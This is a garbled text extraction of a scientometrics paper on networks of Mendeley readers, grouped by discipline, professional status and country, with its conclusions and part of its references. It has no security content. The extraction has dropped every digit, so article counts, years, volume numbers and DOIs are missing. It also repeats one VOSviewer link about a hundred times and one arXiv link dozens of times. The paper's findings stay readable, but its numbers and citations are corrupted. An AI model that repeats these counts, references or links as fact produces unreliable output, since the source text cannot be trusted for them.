http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://dx.doi.org/ . /peerj-cs. encourage other researchers to use mendeley data for larger publication sets in order to inspect usage structure of publications (gunn, ). the mendeley readership networks were generated by using different types of user information: their ( ) disciplinary affiliation ( ) professional status, and ( ) country. all three information sources can be used to produce meaningful network results. in terms of disciplines, first, we found four groups: ( ) biology, ( ) social science and humanities (including relevant computer science), ( ) bio-medical sciences, and ( ) natural science and engineering. in all four groups, the category with the addition “miscellaneous” prevails. probably, the readers who identify themselves with cross-disciplinary research interests are more inclined to generate these “bookmark couplings” than more specifically specialized readers. the pronounced position of the social sciences and the humanities was not expected. some sub-disciplines, e.g., “judaism” and “catholicism”, are disconnected from the other sub-disciplines. the decomposition in terms of status hierarchies within the network makes clear that this hierarchy is inversed in mendeley. the lead among the users is taken by students working on theses. more than professionals, students have time to explore the literature beyond their specialization. lecturers and senior lecturers entertain a different reading pattern, given their primary tasks in education. librarians make use of mendeley (and scholarly literature) differently from researchers. students—having the highest absolute number of reader counts—also have the highest eigenvector centrality in the network which indicates that they have a strong bookmark coupling when compared with other status groups (e.g., lecturer or librarian). the calculated eigenvector centralities correlate strongly with the absolute number of observed reader counts. the decomposition in terms of nations highlights the worldwide divide between developed and less-developed nations. a similar prevailing divide was recently also found in portfolio analysis of journal literature by leydesdorff, heimeriks & rotolo (in press). more fine-grained delineations can partially be recognized as regional, but could not always be provided with an obvious interpretation. the academic status information is provided by every mendeley user and nearly every mendeley user provides (sub-) discipline information. surprisingly, the vast majority of mendeley readers assign the miscellaneous sub-discipline of their main discipline to themselves. only a minority of mendeley users seems to provide their location. this makes it more difficult to analyze the reader counts broken down by countries. some mendeley academic status groups seem redundant (e.g., doctoral student and student phd), while others seem to be tailored to the british (e.g., lecturer and senior lecturer) or the us system (e.g., assistant professor and associate professor). it is not clear to which extent mendeley users assign the precise sub-discipline, status, and location information to themselves and whether they update this information regularly. despite these shortcomings of the mendeley classification system and the quality of information the users provide, the network analyses of mendeley reader counts from three different perspectives produced interesting insights in readership patterns. this shows that useful network analysis can be performed using mendeley readership counts. haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. conclusions in this study, we analyzed mendeley readership data of a set of , , articles and , reviews with publication year to generate three different networks: ( ) the network based on disciplinary affiliations of mendeley readers contains four groups: (i) biology, (ii) social sciences and humanities (including relevant computer sciences), (iii) bio-medical sciences, and (iv) natural sciences and engineering. in all four groups, the category with the addition “miscellaneous” prevails. ( ) the network of co-readers in terms of professional status shows that mendeley is mainly shared among phd students, master’s students, and postdocs. ( ) the country network focusses on global readership patterns: it identifies a group of nations that are core to the scientific enterprise, including two thirds of the oecd countries as well as russia and china. acknowledgements the bibliometric data used in this paper are from an in-house database developed and maintained by the max planck digital library (mpdl, munich) and derived from the science citation index expanded (sci-e), social sciences citation index (ssci), arts and humanities citation index (ahci) provided by thomson reuters (philadelphia, pennsylvania, usa). additional information and declarations funding the authors received no funding for this work. competing interests loet leydesdorff is an academic editor for peerj computer science. author contributions • robin haunschild conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • lutz bornmann conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • loet leydesdorff analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: this paper was available on the arxiv in a previous version. arxiv: http://arxiv.org/abs/ . . haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. references blondel vd, guillaume jl, lambiotte r, lefebvre e. . fast unfolding of communities in large networks. journal of statistical mechanics—theory and experiment :p doi . / - / / /p . bonacich p. . factoring and weighting approaches to status scores and clique identification. journal of mathematical sociology ( ): – doi . / x. . . börner k, sanyal s, vespignani a. . network science. annual review of information science and technology ( ): – doi . /aris. . . bornmann l. . do altmetrics point to the broader impact of research? an overview of benefits and disadvantages of altmetrics. journal of informetrics ( ): – doi . /j.joi. . . . bornmann l. . alternative metrics in scientometrics: a meta-analysis of research into three altmetrics. scientometrics ( ): – doi . /s - - -y. bornmann l, haunschild r. . which people use which scientific papers? an evaluation of data from f and mendeley. journal of informetrics ( ): – doi . /j.joi. . . . de nooy w, mrvar a, batagelj v. . exploratory social network analysis with pajek. new york: cambridge university press. gunn w. . mendeley: enabling and understanding scientific collaboration. information services and use ( ): – doi . /isu- . haunschild r, bornmann l. . f prime: an analysis of discipline-specific reader data from mendeley [version ; referees: approved with reservations, not approved]. f research : doi . /f research. . . haustein s, larivière v. a. mendeley as a source of readership by students and postdocs? evaluating article usage by academic status. in: paper presented at the proceedings of the iatul conferences. paper . haustein s, larivière v. b. a multidimensional analysis of aslib proceedings—using everything but the impact factor. aslib journal of information management ( ): – doi . /ajim- - - . jeng w, he dq, jiang jp. . user participation in an academic social networking service: a survey of open group users on mendeley. journal of the association for information science and technology ( ): – doi . /asi. . kessler mm. . bibliographic coupling between scientific papers. american documentation ( ): – doi . /asi. . kraker p, schlögl c, jack k, lindstaedt s. . visualization of co-readership patterns from an online reference management system. arxiv preprint. arxiv: . . leydesdorff l. . science visualization and discursive knowledge. in: cronin b, sugimoto c, eds. beyond bibliometrics: harnessing multidimensional indicators of scholarly impact. cambridge: mit press, – . leydesdorff l, heimeriks g, rotolo d. . journal portfolio analysis for countries, cities, and organizations: maps and comparisons. journal of the association for information science and technology in press. maflahi n, thelwall m. . when are readership counts as useful as citation counts? scopus versus mendeley for lis journals. journal of the 